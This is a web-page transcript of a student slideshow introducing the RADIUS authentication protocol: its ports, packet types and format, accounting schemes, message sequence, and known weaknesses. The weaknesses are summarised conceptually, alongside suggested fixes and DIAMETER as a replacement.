introduction to radius protocol l.
Download
Skip this Video
Loading SlideShow in 5 Seconds..
Introduction to RADIUS Protocol PowerPoint Presentation
Download Presentation
Introduction to RADIUS Protocol

Loading in 2 Seconds...

play fullscreen
1 / 12

Introduction to RADIUS Protocol - PowerPoint PPT Presentation


  • 466 Views
  • Uploaded on

Introduction to RADIUS Protocol. Presented By: Hiral Shah Varsha Mahalingappa. RADIUS. Introduction : RADIUS is an application level protocol that carries authentication, authorization and configuration information between a Network Access Server (NAS) and a Shared Authentication Server.

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha
Download Presentation

PowerPoint Slideshow about 'Introduction to RADIUS Protocol' - Rita


An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
introduction to radius protocol

Introduction to RADIUS Protocol

Presented By:

Hiral Shah

Varsha Mahalingappa

radius

RADIUS

Introduction :

RADIUS is an application level protocol that carries authentication, authorization and configuration information between a Network Access Server (NAS) and a Shared Authentication Server.

Transport protocol - UDP

UDP Port 1812 – Authentication

UDP Port 1813 - Accounting

Key Featuresof RADIUS :

Client Server model

Network Security

Flexible Authentication mechanism

Extensible protocol

access reject access challenge accounting request accounting response
Access-RejectAccess-ChallengeAccounting-RequestAccounting-ResponseAccess-RejectAccess-ChallengeAccounting-RequestAccounting-Response

Terminology :

  • Service
  • Session
  • Silently discard
  • Access-Request
  • Access-Accept
radius overview

User

Radius

Client

Radius

Server

RADIUS Overview :

Authentication

Request

Username &

Password

Authentication

Acknowledgement

authentication and authorization

Radius

Client

Radius

Server

Authentication and Authorization :

Access Request Frame

Access-Reject

or Access-Challenge

or Access-Accept

accounting
Accounting
  • Key : Access Request, Access-Reject, an Access-Challenge or an Access-Accept
  • Built-in accounting schemes:
    • Unix accounting
      • Accounting data are stored in files and can be viewed using radwho and radlast commands
    • Detailed accounting
      • The detailed accounting information is stored in plain text format. The resulting files can easily be parsed using standard text processing tool.
    • SQL accounting
      • information stores it in an SQL database, processed using standard SQL queries.
  • Radius is extensible
packet frame
Packet Frame:
  • Details
    • Code
    • Identifier
    • Length
    • Authenticator - Value used to authenticate the reply from the RADIUS server
    • Attributes - The data
client server sequence
Client Server Sequence
  • NAS sends encrypted user info with access request
  • Access accept with IP-address, network mask, allowed session time, etc
  • Accounting Phase starts with Accounting Request
  • When user logs out accounting phase ends with NAS sending an 'Accounting-request (Stop)' with some additional information.
  • The RADIUS Server responds with an 'Accounting-response' when the accounting information is stored.
limitations
Limitations
  • Response Authenticator Based Shared Secret Attack
    • Attacker listens to requests and server responses, and pre-compute MD5 state, which is the prefix of the response authenticator:

MD5(Code+ID+Length+ReqAuth+Attrib)

    • Perform an exhaustive search on shared secret, adding it to the above MD5 state each time.
  • User-Password Attribute Based Shared Secret Attack
    • Perform an exhaustive search on shared secret.
    • The attacker attempts a connection to the NAS, and intercepts the access-request.
  • User-Password Based Password Attack
    • Performs an exhaustive / dictionary attack on password, XORing it with above MD5 and sending it each time in appropriate attribute.
    • Possible due to no authentication on request packet.
limitations continued
Limitations Continued…
  • Shared Secret Hygiene
    • Viewed as single client
    • Small key size enabling easy attack
  • Request Authenticator Based Attacks
    • Passive User-Password Compromise through Repeated Request Authenticators
    • Active User-Password Compromise through Repeated Request Authenticators
      • Attacker builds a dictionary as before.
      • When he predicts he can cause NAS to use a certain ReqAuth, he tries to connect it and intercepts access-request.
  • Replay of Server Responses through Repeated Request Authenticators
    • The attacker builds a dictionary with ReqAuth, ID and entire server response.
    • Most server responses will be access-accept.
conclusion
Conclusion
  • RADIUS is a remote authentication protocol.
  • RADIUS is a de-facto standard for remote authentication.
  • RADIUS is an extensible protocol, and can support many authentication methods (e.g. EAP).
  • RADIUS has several weaknesses.
    • Usage of stream cipher
    • Transaction of Access-Request not authenticated at all
    • The RADIUS specification should require each client use a different Shared Secret. It should also require the shared secret to be a random bit string at least 16 octets long that is generated by a PRNG.
  • DIAMETER brought in to replace RADIUS and fix some of the flaws
      • Uses TCP
      • Better transmission level security using IPSEC
references
References
  • Radius can be downloaded from http://ftp.gnu.org/gnu/radius/
  • http://www.panasia.org.sg/conf/pan/c001p028.htm
  • http://www.ietf.org/rfc/rfc2865.txt
  • http://www.ietf.org/rfc/rfc2866.txt
  • http://www.gnu.org/software/radius/radius.html
  • http://www2.rad.com/networks/2000/radius/home.htm